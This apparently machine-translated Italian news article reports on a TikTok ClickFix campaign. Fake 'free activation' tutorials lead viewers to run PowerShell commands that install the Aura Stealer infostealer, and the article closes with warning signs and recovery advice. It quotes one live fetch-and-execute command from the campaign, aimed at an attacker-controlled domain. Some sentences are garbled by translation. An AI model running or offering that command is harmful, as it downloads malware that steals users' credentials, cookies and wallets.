Un'ondata di video su TikTok promette di "attivare" Windows, Photoshop o Netflix senza pagare, ma in realtà porta gli utenti a scappare istruzioni camuffate che finiscono per installare malware e fornire i tuoi dati ai criminali. Sotto le spoglie di semplici guide tecniche, i creatori delineano i passaggi che, se seguiti alla lettera, aprire la porta alle infezioni e al furto di credenziali.
I ricercatori del SANS Internet Storm Center, tra cui Xavier Mertens, e media specializzati come BleepingComputer e analisti di Trend Micro, hanno descritto una campagna coordinata che sfrutta la tecnica chiamata ClickFixIn sostanza, la vittima è convinta a lanciare Comandi di PowerShell, che si connettono a server remoti e scarica payload dannoso ospitati anche su servizi legittimi, come Cloudflare Pages.
Come funzionano i video e la catena di infezione
Le clip riproducono lo stile di un tutorial “passo dopo passo” e utilizzano istruzioni visive che imitano il supporto tecnicoL'obiettivo è che l'utente copi un comando breve, ad esempio iex (irm slmgr.win/photoshop)ed eseguirlo in PowerShell con autorizzazioni di amministratore. Quel semplice gesto, che sembra innocente, scarica lo script dei trigger in più da un sito web controllato dagli aggressori.
Una volta eseguito il primo script, si verifica una seconda fase: arrivano due eseguibili al team dall'infrastruttura remota. Secondo l'analisi, uno di questi corrisponde a Ladro d'aura, un ladro di informazioni in grado di raccogliere dati sensibili; l'altro compilare o distribuire codice su richiesta e il suo scopo esatto non è ancora chiaro, anche se suggerisce funzioni di estensione dell'attacco o di persistenza.
Il successo della campagna si basa sull' senso di legittimità Questi video trasmettono: comandi "su misura" per ogni software, brevi spiegazioni e un formato che incoraggia ad agire senza pensare. La combinazione di fretta, fiducia nel creatore e la promessa di ottenere qualcosa di "premium" a costo zero. riduce l'attenzione dell'utente.
Gli aggressori stanno anche sfruttando l'enorme portata di TikTok. Con pochi contenuti, un profilo appena creato può accumulare migliaia di visualizzazioni, il che moltiplica la portata della truffa nel giro di poche ore.
Quali dati rubano e quale controllo ottengono
Una volta attivo, Aura Stealer si concentra su estrarre le credenziali di accesso, cookie di autenticazione e possibile accesso a portafogli di criptovaluta Memorizzate nei browser o nelle applicazioni. Con queste informazioni nelle mani dei criminali, è possibile accedere a servizi come e-mail, social media o servizi bancari.
Il secondo eseguibile osservato può agire come modulo di supporto, sia per espandere le capacità, mantenere l'accesso o rendere più difficile la rimozione del malware. Gli esperti non escludono la possibilità di implementare componenti aggiuntivi, che aumenta il rischio di usi successivi, ad esempio trasformando il computer in parte di una botnet o facilitando ulteriori attacchi.
La conseguenza immediata per chi ha seguito i presunti “trucchi” è chiara: password compromesse e possibile esposizione di dati personali e finanziari. Inoltre, esecuzione di codice con privilegi di amministratore può dare un controllo profondo dal sistema a terze parti.
Segnali di allarme e come proteggersi
È meglio diffidare di qualsiasi video che promette di "attivare gratuitamente" o "sbloccare" funzionalità a pagamento. Segnali come comandi per il terminale, link abbreviati, download al di fuori dei siti ufficiali, profili con poca attività o commenti disabilitati sono segnali d'allarme che non dovrebbero essere ignorati.
- Non copiare o eseguire comandi visualizzati sui social media, in particolare in PowerShell o terminali con autorizzazioni elevate.
- Usa sempre software e licenze legittimi ed evitare installatori non verificati o crack.
- Mantieni il sistema aggiornato e antivirus e attiva la verifica in due passaggi su tutti i tuoi account.
- Fai attenzione ai link e ai download fuori dalle pagine ufficiali dal fornitore.
Cosa fare se sei già caduto
Se hai seguito le istruzioni in uno di questi video, agisci immediatamente: cambia tutte le tue password (e-mail, reti, servizi bancari, servizi di streaming) da un dispositivo che ritieni pulito e diverso da quello compromesso.
- Fare un Analisi completa con soluzioni di sicurezza aggiornate.
- Elimina i programmi o i file recenti che non riconosci e, se rilevi attività anomale, scollegare l'apparecchiatura dalla rete finché l'infezione non sarà risolta.
- Valutare il ripristino del sistema o reintegrazione Se il danno persiste, abilita la 2FA su tutti i servizi supportati.
Per quanto allettanti possano essere queste “offerte”, non c’è Metodi legittimi per ottenere software a pagamento senza licenzaEvitare di eseguire comandi da fonti sconosciute e limitarsi ai canali ufficiali è di gran lunga il modo migliore per evitare di eseguire comandi da fonti sconosciute. il modo migliore per evitare queste campagne che sfruttano il formato veloce e si affidano a TikTok.